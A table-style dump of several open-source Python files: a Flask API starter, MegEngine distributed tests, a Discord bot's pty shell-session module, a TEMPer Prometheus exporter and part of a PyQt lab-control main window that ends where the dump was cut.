source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
import logging
import requests
from flask import Flask
from flask_restful import Api
from multiprocessing import Process
import cli
from api.resources import HelloWorld, Shutdown
def create_api(config_name='default'):
app = Flask(__name__)
api = Api(app)
app.config.from_object(cli.api_config)
api.add_resource(HelloWorld, '/')
api.add_resource(Shutdown, '/shutdown')
return app
def start_api(config_name='default'):
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# log.disabled = True
api_app = create_api()
p = Process(target=api_app.run)
p.start()
while True:
try:
requests.get(cli.api_config.BASE_URL, timeout=0.1)
return
except requests.exceptions.ConnectionError:
pass
def stop_api(config_name='default'):
requests.post(cli.api_config.BASE_URL + '/shutdown')
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.require_ngpu(2)
@pytest.mark.parametrize("backend", ["nccl"])
@pytest.mark.isolated_distributed
def test_init_process_group(backend):
world_size = 2
server = dist.Server()
port = server.py_server_port
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed() == True
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(3)
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
@dist.launcher
def worker():
rank = dist.get_rank()
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
worker()
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
server = dist.Server()
port = server.py_server_port
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
server = dist.Server()
port = server.py_server_port
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_user_set_get():
@dist.launcher
def worker():
# set in race condition
dist.get_client().user_set("foo", 1)
# get in race condition
ret = dist.get_client().user_get("foo")
assert ret == 1
worker()
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
@pytest.mark.require_ngpu(2)
@pytest.mark.parametrize("early_return", [False, True], ids=["common", "early_return"])
@pytest.mark.isolated_distributed
def test_collect_results(early_return):
@dist.launcher
def worker():
if early_return:
exit(0)
return (dist.get_rank(), dist.get_world_size())
results = worker()
world_size = len(results)
assert world_size > 0
expects = (
[None] * world_size
if early_return
else [(dev, world_size) for dev in range(world_size)]
)
assert results == expects
|
bash.py
|
# -*- coding: utf-8 -*-
import asyncio
import os
import sys
import threading
import pyte
from bashbot import bot
class BashSession:
def __init__(self, terminal):
self.name = None
self.description = None
self.status = "dead"
self.controls = None
self.message = None
self.discord_client = None
self.fd = None
self.terminal = terminal
self.stream = pyte.ByteStream(self.terminal)
self.last_output = None
self.new_update = True
def open(self, loop):
pid, self.fd = os.forkpty()
if pid == 0:
if bot.settings.get("user") and "login" in bot.settings.get("user") and bot.settings.get("user")["login"]:
os.execv(bot.settings.get("terminal")["su_path"],
[bot.settings.get("terminal")["su_path"], "-", bot.settings.get("user")["login"], "-s", bot.settings.get("terminal")["shell_path"]])
else:
os.execv(bot.settings.get("terminal")["shell_path"], [bot.settings.get("terminal")["shell_path"], ])
sys.exit(0)
else:
self.status = "working"
pty_output = threading.Thread(target=self.watch_output)
pty_output.start()
self.update_output(loop)
return self
def close(self):
os.close(self.fd)
print("Closed session #%s @ %s[%s]" % (self.name, self.message.channel.name, (
self.message.channel.server.name if hasattr(self.message.channel, "server") else "PM")))
def send_input(self, data):
try:
os.write(self.fd, self.replace_shortcuts(data).encode("utf-8"))
except OSError:
self.status = "broken"
return
@staticmethod
def replace_shortcuts(command):
d = {
'[UP]': u'\u001b[A',
'[DOWN]': u'\u001b[B',
'[LEFT]': u'\u001b[D',
'[RIGHT]': u'\u001b[C',
'[ESC]': u'\u001b',
'[TAB]': u'\u0009',
'[T]': u'\u0009',
'[F1]': u'\u001bOP',
'[F2]': u'\u001bOQ',
'[F3]': u'\u001bOR',
'[F4]': u'\u001bOS',
'[F5]': u'\u001b[15~',
'[F6]': '',
'[F7]': u'\u001b[18',
'[F8]': u'\u001b[19~',
'[F9]': u'\u001b[20~',
'[F10]': u'\u001b[21~',
'[F11]': u'\u001b[23~\u001b',
'[F12]': u'\u001b[24~\u0008',
'[<]': u'\u001b\u0005\u0015', # ^E^U Clears input line
'<ESC>': u'\u001b',
'\\a': '\a',
'\\b': '\b',
'\\f': '\f',
'\\n': '\n',
'\\r': '\r',
'\\t': '\t',
'\\v': '\v'
}
d = {**d, **bot.settings.get("custom_shortcuts")}
ctrl_chars = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_"
for char in ctrl_chars:
command = command.replace("^" + char, str(chr(ctrl_chars.index(char))))
for initial, to in d.items():
command = command.replace(initial, to)
return command
def update_output(self, loop):
update_output = threading.Timer(
int(bot.settings.get("terminal")["refresh"]),
self.update_output,
args=(loop,))
update_output.start()
if not self.last_output:
return
if self.status != "frozen" and self.new_update:
self.send_output(loop)
self.new_update = False
if self.status == "broken":
update_output.join()
def send_output(self, loop):
updated_message = bot.settings.get("terminal_template") % (
self.name,
self.status.title(),
self.last_output)
asyncio.set_event_loop(loop)
asyncio.run_coroutine_threadsafe(
self.discord_client.edit_message(
self.message, updated_message),
loop
)
self.message.content = updated_message
def watch_output(self):
try:
output = os.read(self.fd, 1024)
# Send init input when ready
if bot.settings.get("user") and bot.settings.get("user")["password"]:
self.send_input(bot.settings.get("user")["password"] + "\n") # Login via su
# Set init variables
self.send_input("\n".join(bot.settings.get("terminal")["init"]) + "\n")
except OSError:
self.status = "broken"
return
while output:
self.stream.feed(output.replace(b"(B", b""))
message = "\n".join(self.terminal.display)
self.last_output = message.replace("```", "'''")
if bot.settings.get("show_cursor") == "true":
characters = list(message)
characters[self.terminal.cursor.y * message.index("\n") + self.terminal.cursor.x] = "█"
self.last_output = "".join(characters)
self.new_update = True
try:
output = os.read(self.fd, 1024)
except OSError:
self.status = "broken"
return
|
__init__.py
|
import argparse
import ipaddress
import functools
import os
import signal
import sys
import threading
import wsgiref.simple_server
import prometheus_client
import prometheus_client.core as core
import pyudev
from . import exporter
from . import temper
from . import wsgiext
def main():
'''
You are here.
'''
parser = argparse.ArgumentParser()
parser.add_argument('--bind-address', type=ipaddress.ip_address, default='::', help='IPv6 or IPv4 address to listen on')
parser.add_argument('--bind-port', type=int, default=9204, help='Port to listen on')
parser.add_argument('--bind-v6only', type=int, choices=[0, 1], help='If 1, prevent IPv6 sockets from accepting IPv4 connections; if 0, allow; if unspecified, use OS default')
parser.add_argument('--thread-count', type=int, help='Number of request-handling threads to spawn')
args = parser.parse_args()
class MyCollector(exporter.Collector):
def class_for_device(self, device):
return temper.matcher.match(device)
collector = MyCollector()
core.REGISTRY.register(collector)
server = wsgiext.Server((str(args.bind_address), args.bind_port), max_threads=args.thread_count, bind_v6only=args.bind_v6only)
server.set_app(prometheus_client.make_wsgi_app())
wsgi_thread = threading.Thread(target=functools.partial(server.serve_forever, poll_interval=86400), name='wsgi')
ctx = pyudev.Context()
mon = temper.monitor(ctx)
observer_thread = pyudev.MonitorObserver(mon, name='monitor', callback=collector.handle_device_event)
health_thread = Health([collector, server], 30)
def handle_sigterm(signum, frame):
health_thread.send_stop()
server.send_stop()
observer_thread.send_stop()
signal.signal(signal.SIGTERM, handle_sigterm)
wsgi_thread.start()
observer_thread.start()
health_thread.start()
collector.coldplug_scan(temper.list_devices(ctx))
wsgi_thread.join()
observer_thread.join()
health_thread.join()
server.server_close()
sys.exit(health_thread.exit_status)
class Health(threading.Thread):
def __init__(self, components, interval):
super().__init__(name='health')
self.__components = (component for component in components)
self.__interval = interval
self.__event = threading.Event()
self.exit_status = 0
def send_stop(self):
'''
Cause the thread to exit.
'''
self.__event.set()
def run(self):
'''
Monitor the health of the service.
If something fails, sends SIGTERM to the process. The signal handler
(which always runs in the main thread) will shut down the components
and then the process will exit.
We don't have to provide detailed error messages, since the component
that failed should already have logged something useful.
'''
try:
while not self.__event.wait(self.__interval):
if not self.__healthy():
self.exit_status = 1
return
finally:
if self.exit_status != 0:
os.kill(os.getpid(), signal.SIGTERM)
def __healthy(self):
try:
return all(component.healthy() for component in self.__components)
except Exception:
return False
|
main_window.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import atexit
import os
import sys
import time
import json
import logging
import signal
import socket
import threading
import configparser
import platform
#from tkinter import filedialog#, ttk
#import tkinter
import numpy as np
from . import widgets
import pyqtgraph as pg
from datetime import datetime
#import OpenGL
from PyQt5.QtCore import QSharedMemory, QSize
from PyQt5.QtGui import QColor, QIcon, QStandardItem, QStandardItemModel
from PyQt5.QtWidgets import QFileDialog, QMessageBox, QListView, QDockWidget, QVBoxLayout, QAction
from PyQt5.QtNetwork import QLocalServer
from PyQt5 import QtWidgets, uic, QtCore, QtGui
from PyQt5.Qt import Qt as QtConst
from pyqtgraph.dockarea import DockArea
import atomize.main.messenger_socket_server as socket_server
###AWG
sys.path.append('/home/pulseepr/Sources/AWG/Examples/python')
sys.path.append('/home/anatoly/AWG/spcm_examples/python')
from pyspcm import *
from spcm_tools import *
class MainWindow(QtWidgets.QMainWindow):
"""
A main window class.
"""
def __init__(self, *args, **kwargs):
"""
A function for connecting actions and creating a main window.
"""
super(MainWindow, self).__init__(*args, **kwargs)
# absolute path to icon:
self.path_to_main = os.path.abspath(os.getcwd())
self.icon_path = os.path.join(self.path_to_main,'atomize/main','Icon.png')
self.setWindowIcon(QIcon(self.icon_path))
#self.destroyed.connect(MainWindow._on_destroyed) # connect some actions to exit
self.destroyed.connect(lambda: self._on_destroyed()) # connect some actions to exit
# Load the UI Page
uic.loadUi('atomize/main/gui/main_window.ui', self) # Design file
# important attribures
if len(sys.argv) > 1 and sys.argv[1] != '': # for bash option
self.script = sys.argv[1]
self.open_file( self.script )
elif len(sys.argv) == 1:
self.script = '' # for not opened script
self.test_flag = 0 # flag for not running script if test is failed
self.flag_opened_script_changed = 0 # flag for saving changes in the opened script
self.path = os.path.join(self.path_to_main,'atomize/tests')
# Connection of different action to different Menus and Buttons
self.tabwidget.tabBar().setTabTextColor(0, QColor(193, 202, 227))
self.tabwidget.tabBar().setTabTextColor(1, QColor(193, 202, 227))
self.tabwidget.tabBar().setTabTextColor(2, QColor(193, 202, 227))
self.button_open.clicked.connect(self.open_file_dialog)
self.button_open.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_edit.clicked.connect(self.edit_file)
self.button_edit.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_test.clicked.connect(self.test)
self.button_test.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_reload.clicked.connect(self.reload)
self.button_reload.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227); }\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_start.clicked.connect(self.start_experiment)
self.button_start.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.button_help.clicked.connect(self.help)
self.button_help.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.button_quit.clicked.connect(lambda: self.quit())
self.button_quit.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.textEdit.setStyleSheet("QPlainTextEdit {background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); }\
QScrollBar:vertical {background-color: rgb(42, 42, 64);}")
# show spaces
option = QtGui.QTextOption()
option.setFlags( QtGui.QTextOption.ShowTabsAndSpaces ) # | QtGui.QTextOption.ShowLineAndParagraphSeparators
self.textEdit.document().setDefaultTextOption(option)
self.textEdit.textChanged.connect(self.save_edited_text)
# set tab distance
self.textEdit.setTabStopDistance( QtGui.QFontMetricsF(self.textEdit.font()).horizontalAdvance(' ') * 4 )
#self.textEdit.setTabStopWidth( 20 )
self.text_errors.top_margin = 2
self.text_errors.setCenterOnScroll(True)
self.text_errors.ensureCursorVisible()
self.text_errors.setContextMenuPolicy(QtConst.ActionsContextMenu)
self.text_errors.setStyleSheet("QPlainTextEdit {background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); } \
QMenu::item { color: rgb(211, 194, 78); } QMenu::item:selected {color: rgb(193, 202, 227); }")
clear_action = QAction('Clear', self.text_errors)
clear_action.triggered.connect(self.clear_errors)
self.text_errors.addAction(clear_action)
# Control Window tab setting
self.tab_control.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); ")
self.button_osc.clicked.connect(self.start_osc_control)
self.button_osc.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_dig.clicked.connect(self.start_dig_control)
self.button_dig.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_mw.clicked.connect(self.start_mw_control)
self.button_mw.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_temp.clicked.connect(self.start_temp_control)
self.button_temp.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_pulse.clicked.connect(self.start_pulse_control)
self.button_pulse.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_awg.clicked.connect(self.start_awg_control)
self.button_awg.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_phasing.clicked.connect(self.start_phasing)
self.button_phasing.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_awg_phasing.clicked.connect(self.start_awg_phasing)
self.button_awg_phasing.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.fft_analyzer.clicked.connect(self.start_fft_control)
self.fft_analyzer.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_t2.clicked.connect(self.start_t2_preset)
self.button_t2.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_t1.clicked.connect(self.start_t1_preset)
self.button_t1.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_echo.clicked.connect(self.start_echo_preset)
self.button_echo.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_eseem.clicked.connect(self.start_eseem_preset)
self.button_eseem.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_tune.clicked.connect(self.start_tune_preset)
self.button_tune.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_laser.clicked.connect(self.start_laser_preset)
self.button_laser.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.label_creator.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_filename.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.script_chooser.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.script_chooser.currentIndexChanged.connect(self.script_open_combo)
self.script = self.text_to_script_name( self.script_chooser.currentText() )
# preopen script
self.open_file( self.script )
self.checkTests.setStyleSheet("QCheckBox { color : rgb(193, 202, 227); }")
# Liveplot tab setting
self.dockarea = DockArea()
self.namelist = NameList(self)
self.tab_liveplot.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); ")
self.gridLayout_tab_liveplot.setColumnMinimumWidth(0, 200)
self.gridLayout_tab_liveplot.setColumnStretch(1, 2000)
self.gridLayout_tab_liveplot.addWidget(self.namelist, 0, 0)
self.gridLayout_tab_liveplot.setAlignment(self.namelist, QtConst.AlignLeft)
self.gridLayout_tab_liveplot.addWidget(self.dockarea, 0, 1)
#self.gridLayout_tab_liveplot.setAlignment(self.dockarea, QtConst.AlignRight)
self.namelist.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); border: 2px solid rgb(40, 30, 45)")
self.namelist.namelist_view.setStyleSheet("QListView::item:selected:active {background-color: rgb(63, 63, 97);\
color: rgb(211, 194, 78); } QListView::item:hover {background-color: rgb(48, 48, 75); }")
self.namelist.namelist_view.setStyleSheet("QMenu::item:selected {background-color: rgb(48, 48, 75); }")
# Liveplot server settings
self.server = QLocalServer()
self.server.removeServer('LivePlot')
self.server.listen('LivePlot')
self.server.newConnection.connect(self.accept)
self.bytes = bytearray()
self.target_size = 0
self.meta = None
self.insert_dock_right = True
self.conns = []
self.shared_mems = []
signal.signal(signal.SIGINT, self.close)
# configuration data
path_config_file = os.path.join(self.path_to_main,'atomize/config.ini')
config = configparser.ConfigParser()
config.read(path_config_file)
# directories
self.open_dir = str(config['DEFAULT']['open_dir'])
self.script_dir = str(config['DEFAULT']['script_dir'])
self.path = self.script_dir
self.test_timeout = int(config['DEFAULT']['test_timeout']) * 1000 # in ms
# for running different processes using QProcess
self.process = QtCore.QProcess(self)
self.process_text_editor = QtCore.QProcess(self)
self.process_python = QtCore.QProcess(self)
self.process_pulse = QtCore.QProcess(self)
self.process_osc = QtCore.QProcess(self)
self.process_dig = QtCore.QProcess(self)
self.process_mw = QtCore.QProcess(self)
self.process_temp = QtCore.QProcess(self)
self.process_t2 = QtCore.QProcess(self)
self.process_t1 = QtCore.QProcess(self)
self.process_echo = QtCore.QProcess(self)
self.process_laser = QtCore.QProcess(self)
self.process_eseem = QtCore.QProcess(self)
self.process_tune = QtCore.QProcess(self)
self.process_awg = QtCore.QProcess(self)
self.process_fft = QtCore.QProcess(self)
self.process_phasing = QtCore.QProcess(self)
self.process_awg_phasing = QtCore.QProcess(self)
# check where we are
self.system = platform.system()
if self.system == 'Windows':
self.process_text_editor.setProgram(str(config['DEFAULT']['editorW']))
self.process.setProgram('python.exe')
self.process_python.setProgram('python.exe')
self.process_pulse.setProgram('python.exe')
self.process_osc.setProgram('python.exe')
self.process_dig.setProgram('python.exe')
self.process_mw.setProgram('python.exe')
self.process_temp.setProgram('python.exe')
self.process_t2.setProgram('python.exe')
self.process_t1.setProgram('python.exe')
self.process_echo.setProgram('python.exe')
self.process_laser.setProgram('python.exe')
self.process_eseem.setProgram('python.exe')
self.process_tune.setProgram('python.exe')
self.process_awg.setProgram('python.exe')
self.process_fft.setProgram('python.exe')
self.process_phasing.setProgram('python.exe')
self.process_awg_phasing.setProgram('python.exe')
elif self.system == 'Linux':
self.editor = str(config['DEFAULT']['editor'])
if self.editor == 'nano' or self.editor == 'vi':
self.process_text_editor.setProgram('xterm')
else:
self.process_text_editor.setProgram(str(config['DEFAULT']['editor']))
self.process.setProgram('python3')
self.process_python.setProgram('python3')
self.process_pulse.setProgram('python3')
self.process_osc.setProgram('python3')
self.process_dig.setProgram('python3')
self.process_mw.setProgram('python3')
self.process_temp.setProgram('python3')
self.process_t2.setProgram('python3')
self.process_t1.setProgram('python3')
self.process_echo.setProgram('python3')
self.process_laser.setProgram('python3')
self.process_eseem.setProgram('python3')
self.process_tune.setProgram('python3')
self.process_awg.setProgram('python3')
self.process_fft.setProgram('python3')
self.process_phasing.setProgram('python3')
self.process_awg_phasing.setProgram('python3')
self.process.finished.connect(self.on_finished_checking)
self.process_python.finished.connect(self.on_finished_script)
############################################## Liveplot Functions
def close(self, sig = None, frame = None):
#print('closing')
for conn in self.conns:
conn.close()
for shm in self.shared_mems:
shm.detach()
self._on_destroyed()
#QApplication.instance().exit()
def accept(self):
logging.debug('connection accepted')
conn = self.server.nextPendingConnection()
conn.waitForReadyRead()
key = str(conn.read(36).decode())
memory = QSharedMemory()
memory.setKey(key)
memory.attach()
logging.debug('attached to memory %s with size %s'%(key, memory.size()))
#11-04-2021; Should be uncommented in case of problems
#atexit.register(memory.detach)
self.conns.append(conn)
self.shared_mems.append(memory)
conn.readyRead.connect(lambda: self.read_from(conn, memory))
conn.disconnected.connect(memory.detach)
conn.write(b'ok')
# noinspection PyNoneFunctionAssignment
def read_from(self, conn, memory):
logging.debug('reading data')
self.meta = json.loads(conn.read(300).decode())
if self.meta['arrsize'] != 0:
memory.lock()
raw_data = memory.data()
if raw_data!=None:
ba = raw_data[:self.meta['arrsize']]
arr = np.frombuffer(memoryview(ba), dtype=self.meta['dtype'])
memory.unlock()
conn.write(b'ok')
arr = arr.reshape(self.meta['shape']).copy()
else:
arr = None
else:
arr = None
self.do_operation(arr)
if conn.bytesAvailable():
self.read_from(conn, memory)
def do_operation(self, arr = None):
def clear(name):
self.namelist[name].clear()
def close(name):
self.namelist[name].close()
def remove(name):
del self.namelist[name]
meta = self.meta
operation = meta['operation']
name = meta['name']
if name in self.namelist:
pw = self.namelist[name]
if pw.closed:
pw.closed = False
self.dockarea.addDock(pw)
elif name == "*":
if operation == 'clear':
list(map(clear, list(self.namelist.keys())))
elif operation == 'close':
list(map(close, list(self.namelist.keys())))
elif operation == 'remove':
list(map(remove, list(self.namelist.keys())))
return
else:
if operation in ('clear', 'close', 'remove','none'):
return
pw = self.add_new_plot(meta['rank'], name)
if operation == 'clear':
pw.clear()
elif operation == 'close':
pw.close()
elif operation == 'none':
pass
elif operation == 'remove':
del self.namelist[name]
elif operation == 'plot_y':
start_step = meta['start_step']
label = meta['label']
if start_step is not None:
x0, dx = start_step
nx = len(arr)
xs = np.linspace(x0, x0 + (nx - 1)*dx, nx)
pw.plot(xs, arr, name=label, scatter='False')
else:
pw.plot(arr, name=label, scatter='False')
elif operation == 'plot_xy':
label = meta['label']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
scat = meta['Scatter']
taxis = meta['TimeAxis']
verline = meta['Vline']
tex = meta['value']
pw.plot(arr[0], arr[1], parametric=True, name=label, xname=xnam, xscale =xscal,\
yname=ynam, yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline, text=tex)
elif operation == 'plot_z':
start_step = meta['start_step']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
znam = meta['Zname']
zscal = meta['Z']
tex = meta['value']
if start_step is not None:
(x0, dx), (y0, dy) = start_step
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
pw.setImage(arr, pos=(x0, y0), scale=(dx, dy)) #, axes={'y':0, 'x':1}
# Graph title
if tex != '':
pw.setTitle(meta['value'])
else:
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
pw.setImage(arr) #, axes={'y':0, 'x':1}
# Graph title
if tex != '':
pw.setTitle(meta['value'])
elif operation == 'append_y':
label = meta['label']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
scat = meta['Scatter']
taxis = meta['TimeAxis']
verline = meta['Vline']
xs, ys = pw.get_data(label)
new_ys = list(ys)
new_ys.append(meta['value'])
start_step = meta['start_step']
if start_step is not None:
x0, dx = start_step
nx = len(new_ys)
xs = np.linspace(x0, x0 + (nx - 1)*dx, nx)
pw.plot(xs, new_ys, name=label, xname=xnam, xscale =xscal, yname=ynam,\
yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline)
else:
pw.plot(new_ys, name=label, xname=xnam, xscale =xscal, yname=ynam,\
yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline)
elif operation == 'append_xy':
label = meta['label']
xs, ys = pw.get_data(label)
xn, yn = meta['value']
new_xs = list(xs)
new_xs.append(xn)
new_ys = list(ys)
new_ys.append(yn)
pw.plot(new_xs, new_ys, parametric=True, name=label, scatter='False')
elif operation == 'append_z':
image = pw.get_data()
if image is None:
image = np.array([arr])
else:
try:
image = np.vstack((np.transpose(image), [arr]))
except ValueError:
image = np.array([arr])
start_step = meta['start_step']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
znam = meta['Zname']
zscal = meta['Z']
if start_step is not None:
(x0, dx), (y0, dy) = start_step
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
